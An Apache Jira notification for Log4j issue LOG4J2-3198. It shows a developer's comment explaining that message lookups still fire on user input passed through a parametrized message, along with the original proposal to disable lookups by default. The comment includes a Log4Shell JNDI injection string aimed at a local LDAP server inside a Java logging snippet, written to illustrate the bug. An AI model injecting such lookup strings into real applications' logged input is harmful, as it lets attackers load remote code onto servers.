[
https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457333#comment-17457333
]
Volkan Yazici commented on LOG4J2-3198:
---------------------------------------
[~eever...@usgs.gov], yes, unfortunately the lookup is performed _after_
formatting the message, which includes the user input. Hence the vulnerability
can still be triggered using a {{ParametrizedMessage}}:
{code:java}
String userInput = "${jndi:ldap://127.0.0.1:1389/a}";;
logger.info("foo {}", userInput)
{code}
> Message lookups should be disabled by default
> ---------------------------------------------
>
> Key: LOG4J2-3198
> URL: https://issues.apache.org/jira/browse/LOG4J2-3198
> Project: Log4j 2
> Issue Type: Improvement
> Components: Layouts
> Affects Versions: 2.14.1
> Reporter: Carter Kozak
> Assignee: Carter Kozak
> Priority: Major
> Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs
> and implementation. Given a particular API, there's an expectation that a
> particular shape of call will result in specific results. However, lookups in
> messages can be passed into JUL and will result in resolved output in log4j
> formatted output, but not any other implementations despite no direct
> dependency on those implementations.
> There's also a cost to searching formatted message strings for particular
> escape sequences which define lookups. This feature is not used as far as
> we've been able to tell searching github and stackoverflow, so it's
> unnecessary for every log event in every application to burn several cpu
> cycles searching for the value.
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
